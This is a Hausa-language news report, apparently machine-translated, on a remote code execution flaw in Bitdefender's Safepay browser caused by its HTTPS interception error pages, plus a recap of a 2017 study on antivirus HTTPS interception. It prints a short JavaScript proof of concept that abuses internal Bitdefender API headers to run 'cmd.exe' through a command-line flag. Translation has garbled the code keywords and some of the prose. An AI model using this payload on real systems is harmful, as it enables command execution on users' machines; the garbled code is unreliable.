Vladimir Palant, mahaliccin Adblock Plus. () a cikin ƙwararren mai binciken gidan yanar gizo na Safepay dangane da injin Chromium, wanda aka bayar azaman ɓangare na kunshin riga-kafi na Bitdefender Total Security 2020 da nufin haɓaka amincin aikin mai amfani akan hanyar sadarwar duniya (alal misali, ana ba da ƙarin keɓewa lokacin shiga bankunan da tsarin biyan kuɗi). Rashin lahani yana ba da damar gidajen yanar gizon da aka buɗe a cikin mai binciken don aiwatar da lambar sabani a matakin tsarin aiki.
Dalilin matsalar shine Bitdefender riga-kafi yana yin kutse cikin gida na zirga-zirgar HTTPS ta hanyar maye gurbin ainihin takardar shaidar TLS na rukunin yanar gizon. An shigar da ƙarin takaddun tushe akan tsarin abokin ciniki, wanda ke ba da damar ɓoye aikin tsarin binciken zirga-zirgar da aka yi amfani da shi. Kariyar riga-kafi tana saka kanta cikin zirga-zirgar kariya kuma ta sanya lambar JavaScript ta kanta a cikin wasu shafuka don aiwatar da aikin Binciken Safe, kuma idan akwai matsala tare da amintaccen takaddun haɗin kai, yana maye gurbin shafin kuskuren da aka dawo da nasa. Tun da sabon shafin kuskure yana aiki a madadin uwar garken da ake buɗewa, sauran shafuka akan wannan uwar garken suna da cikakken damar yin amfani da abun ciki da Bitdefender ya saka.
Lokacin buɗe rukunin yanar gizon da maharin ke sarrafawa, wannan rukunin yanar gizon na iya aika da XMLHttpRequest kuma ya nuna matsaloli tare da takaddun HTTPS lokacin amsawa, wanda zai haifar da dawo da shafin kuskure da Bitdefender ya yi. Tun da an buɗe shafin kuskure a cikin mahallin yankin maharin, zai iya karanta abubuwan da ke cikin shafin da aka zuga tare da sigogin Bitdefender. Shafin da Bitdefender ya bayar kuma ya ƙunshi maɓallin zama wanda ke ba ku damar amfani da Bitdefender API na ciki don ƙaddamar da wani zaman mai bincike na Safepay daban, yana ƙayyadaddun tutocin layin umarni na sabani, da ƙaddamar da kowane umarnin tsarin ta amfani da "- utility-cmd-prefix" tuta. Misali na amfani (param1 da param2 sune dabi'u da aka samo daga shafin kuskure):
var request = sabon XMLHttpRequest();
request.bude("POST",Math.random());
request.setRequestHeader ("nau'in abun ciki", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send ("bayanai: rubutu/html, nada — utility-cmd-prefix=\"cmd.exe /k whoami & echo");
Bari mu tuna cewa binciken da aka gudanar a cikin 2017 cewa 24 daga cikin 26 samfuran riga-kafi da aka gwada waɗanda ke duba zirga-zirgar HTTPS ta hanyar lalata takaddun shaida sun rage girman matakin tsaro na haɗin HTTPS.
11 ne kawai daga cikin samfuran 26 suka samar da suites na yanzu. Tsarin 5 ba su tabbatar da takaddun shaida ba (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Tsaron Intanet na Kaspersky da samfuran Tsaro na Jima'i an kai hari , da AVG, Bitdefender da kayayyakin Bullguard ana kaiwa hari и . Dr.Web Antivirus 11 yana ba ku damar jujjuya zuwa ga bayanan fitar da abin da ba a dogara ba (kai hari ).
source: budenet.ru